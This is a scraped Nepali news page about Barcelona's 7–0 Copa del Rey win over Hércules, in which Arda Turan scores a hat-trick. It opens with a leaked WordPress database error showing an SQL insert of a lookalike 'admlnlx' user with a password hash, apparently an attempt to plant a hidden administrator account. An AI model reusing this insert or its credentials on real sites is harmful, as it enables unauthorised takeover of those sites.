WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzYi976GZ7qroanYfQKtLDprBTFvjK.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-22 22:07:17', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ७–
स्पेनिस कोपा डेल रे अन्तर्गत अन्तिम ३२ को भीडन्तमा बार्सिलोनाले हर्क्युलसमाथि गोलको वर्षा गरेको छ ।
नाउ क्याम्पमा भएको अन्तिम ३२ को दोस्रो लेगको खेलमा बार्सिलोनाले हर्क्युलसमाथि ७–० को फराकिलो जित निकालेको हो।
स्टार खेलाडीहरू मेसी, नेइमार र स्वारेजलाई आराम दिइएको खेलमा बार्सिलोनाका लागि आर्डा ट्युरानले ह्याट्रिक गरे। खेलमा बार्सिलोनाले अधिकांश दोस्रो रोजाईका खेलाडी मैदानमा उतारेको थियो।
बार्सिलोनाले पहिलो हाफमा गरेको दुई गोल लुकास डिग्ने र इभान राकिटेकले ३७ औँ र ४५ औं मिनेटमा गोल गरेका थिए ।
दोस्रो हाफमा बार्सा झनै आक्रामक भयो । दोस्रो हाफमा राफिन्हा र ट्युरानले गोल गरेका थिए। ट्युरानले दोस्रो हाफमै आफ्नो ह्याट्रिक पुरा गरेका थिए।
अर्को एक गोल पाको एलकाकेरले गरेका थिए। यसअघि बार्साले पहिलो लेगमा १–१ को बराबरी खेलेको थियो। यो नतिजासँगै बार्सिलोनाले हर्क्युलसमाथि समग्रमा ८–१ को जित हात पारेको छ।